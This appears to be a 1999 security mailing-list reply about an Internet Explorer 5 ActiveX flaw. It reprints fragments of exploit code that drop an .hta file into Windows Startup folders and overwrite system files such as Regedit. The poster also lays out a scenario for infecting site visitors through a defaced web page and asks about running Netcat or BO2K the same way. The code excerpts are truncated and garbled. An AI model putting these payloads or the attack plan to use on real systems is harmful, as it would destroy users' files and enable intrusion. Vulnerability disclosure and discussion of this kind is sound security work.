Re: IE5 allows executing programs

From: SysAdmin (SysAdminat_private)
Date: Sun Aug 29 1999 - 13:24:22 PDT

  • Next message: Przemyslaw Frasunek: "proftpd"

    Okay, I haven't seen any interesting observations yet as to the value of
    this exploit or the potential damage it contains. This exploit allows for
    the OVERWRITING of any application you choose, WITHOUT the system objecting.
    I haven't tested it against anything specific yet, except for a trial run
    against Regedit. The key is to select a specific path in which a known file
    resides, such as C:\\winnt\system32 and then you give the .hta file the name
    of the file you want overwritten. Here's the code originally included;
    <object id="scr"
    scr.Path="C:\\windows\\Start Menu\\Programs\\StartUp\\guninski.hta";
    scr.Doc="<object id='wsh'
    'Written by Georgi Guninski');wsh.Run('c:\\');</"+"SCRIPT>";
    If you wanted this to run against an NT machine then,
    <object id="scr"
    scr.Path="C:\\WINNT\\Profiles\\All Users\\Start
    scr.Doc="<object id='wsh'
    'Screw Denise Richards, Debbie Johnson
    For all those arguing about figuring out which user it should be addressed
    to, the answer is to "All Users"
    Now watch as I modify this to destroy Regedit 32
    <object id="scr"
    scr.Doc="<object id='wsh'
    'Screw Denise Richards, Debbie Johnson
    As you can see the simple malicious damage is unprecedented, good luck
    trying to figure out what's happened when your computers crashed,
    permanently. Now let me give you a simple scenario for a real-world example.
    Let's say a Cracker, we'll call him Ahab, decides to take over ABC or
    Symantec's web page, not that difficult to imagine. Without ever breaking
    the firewall, all he has to do is modify the web page. Now usually they
    detect the obscene message within minutes taking it offline, imagine though
    if Ahab just modified the source, he could include in it both Active X
    exploits, for NT and 98, in addition he could add to the source an
    insturction to change to another web page in 5 seconds, a page he's added to
    InetPub. This new page would include the even more recent exploit that
    crashes IE5 with a form field overflow. Imagine how long it would take for
    anyone to realize that the web page had been hacked, their computers would
    freeze everytime they went there for no apparent reason (the new exploit
    doesn't display the page that froze your browser only the page before) All
    of those home users, the thousands of hits a day they'd be getting, would
    simply connect to the site, get their system Kernal overwritten and have
    their browser crashed, forcing a restart for the home user. Does everyone
    see the potential damage here?
    Has anyone figure out if an arbitrary binary could be executed? Such as Net
    Cat or BO2K? Also, I understand outlook executes this code immediatley, is
    it possible that this same code could cause someone's system to crash merely
    by opening the E-Mail?
    Seth Georgion

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